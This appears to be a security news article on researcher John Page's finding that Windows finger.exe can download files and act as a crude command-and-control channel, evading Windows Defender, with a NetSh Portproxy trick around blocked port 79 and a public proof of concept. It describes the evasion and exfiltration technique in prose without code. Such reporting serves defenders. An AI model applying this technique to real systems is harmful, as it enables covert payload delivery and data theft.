The list of native executables that can download or run malicious code in Windows 10 continues to expand as another one has recently been discovered!
These are referred to as living-off-the-land binaries (LoLBins) and can help attackers circumvent security controls without triggering a system security warning.
The new addition is finger.exe, a command that ships with Windows to retrieve user details on remote computers running the Finger or Daemon service. Connection is conducted via the communication protocol Name / Finger Network.
Security researcher John Page discovered that the Microsoft Windows TCPIP Finger command can also act as a downloader for files and as a primitive command and control (C3) server that can serve to send commands and exfiltrate data.
The C2 commands can be disguised as finger queries that fetch files and exfiltrate data, according to the researcher, without Windows Defender detecting the abnormal behavior.
One issue may be that port 79, which is used by the Finger protocol, is often blocked within an organisation, the page says Friday in a blog post.
A sufficiently privileged attacker, however, can circumvent the restriction by using Windows NetSh Portproxy, which serves as a port redirector for the TCP protocol.
This method would allow HTTP(S) to get past firewall rules and communicate with servers over the unrestricted ports. This way, Portproxy queries are sent to the IP of the local machine and then forwarded to the C2 host listed.
There are also drawbacks when using finger.exe when downloading files, but nothing that can’t be overcome because encoding them with Base64 is enough to escape detection.
Demo available below
The researcher created proof-of-concept (PoC) scripts – DarkFinger.py for the C2 and the client-side DarkFinger-Agent.bat – and released them publicly to demonstrate how finger.exe’s double functionality.
In a video showing how the scripts work, Page compared his newly discovered method to certutil.exe, another LoLBin in Windows abused for malicious purposes.
Windows Defender stopped certutil activity and logged the event, while the DarkFinger script completed the action uninterrupted on a Windows 10 machine:
- source – bleeping computer